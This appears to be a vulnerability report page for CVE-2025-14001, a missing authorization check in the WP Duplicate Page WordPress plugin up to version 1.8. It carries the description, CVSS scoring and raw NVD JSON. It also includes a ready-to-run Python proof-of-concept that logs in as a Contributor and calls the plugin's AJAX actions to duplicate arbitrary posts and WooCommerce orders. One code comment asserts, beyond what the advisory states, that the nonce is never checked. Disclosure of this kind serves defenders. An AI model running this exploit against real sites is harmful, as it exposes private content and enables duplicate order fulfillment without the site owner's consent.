Security Vulnerability Report
CVE-2025-14001 CVSS 5.4 MEDIUM

CVE-2025-14001

Published: 2026-01-13 12:15:49
Last Modified: 2026-04-15 00:35:42

Description

The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's "Allowed User Roles" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Duplicate Page <= 1.8 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14001 PoC - WP Duplicate Page permission bypass
# Authenticated Contributor+ users can exploit this vulnerability to duplicate arbitrary content
import requests
import sys
from urllib.parse import urlencode

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"
TARGET_POST_ID = 123  # ID of the target post/page to duplicate


def get_auth_cookies():
    """Log in and obtain authentication cookies"""
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    resp = session.post(f"{TARGET_URL}/wp-login.php", data=login_data)
    if 'wordpress_logged_in' in str(session.cookies):
        return session.cookies
    return None


def exploit_duplicate_bulk(cookies, post_id):
    """Use the duplicateBulkHandle function to duplicate an arbitrary post"""
    exploit_data = {
        'action': 'duplicate_bulk_handle',
        'post_ids[]': post_id,
        'nonce': 'bypass_nonce_check'  # the function does not validate the nonce
    }
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    resp = requests.post(
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        data=urlencode(exploit_data, doseq=True),
        cookies=cookies,
        headers=headers
    )
    return resp.text


def exploit_hpos_duplicate(cookies, order_id):
    """Use duplicateBulkHandleHPOS to duplicate a WooCommerce HPOS order"""
    exploit_data = {
        'action': 'duplicate_bulk_handle_hpos',
        'post_ids[]': order_id,
    }
    resp = requests.post(
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        data=urlencode(exploit_data, doseq=True),
        cookies=cookies,
        headers={'X-Requested-With': 'XMLHttpRequest'}
    )
    return resp.text


if __name__ == "__main__":
    cookies = get_auth_cookies()
    if not cookies:
        print("[-] Authentication failed")
        sys.exit(1)

    print("[*] Exploiting duplicateBulkHandle...")
    result = exploit_duplicate_bulk(cookies, TARGET_POST_ID)
    print(f"[*] Response: {result}")

    print("[*] Exploiting HPOS duplicate...")
    hpos_result = exploit_hpos_duplicate(cookies, TARGET_POST_ID)
    print(f"[*] HPOS Response: {hpos_result}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14001", "sourceIdentifier": "[email protected]", "published": "2026-01-13T12:15:48.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's \"Allowed User Roles\" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders."}, {"lang": "es", "value": "El plugin WP Duplicate Page para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de capacidad en las funciones 'duplicateBulkHandle' y 'duplicateBulkHandleHPOS' en todas las versiones hasta la 1.8, inclusive. 
Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador o superior, dupliquen publicaciones, páginas y pedidos HPOS de WooCommerce arbitrarios incluso cuando su rol está explícitamente excluido de la configuración 'Roles de usuario permitidos' del plugin, exponiendo potencialmente información sensible y permitiendo el cumplimiento duplicado de pedidos de WooCommerce."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L54", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L79", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3432233/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60830ed8-3ab8-44e8-899c-7032a187da8b?source=cve", "source": "[email protected]"}]}}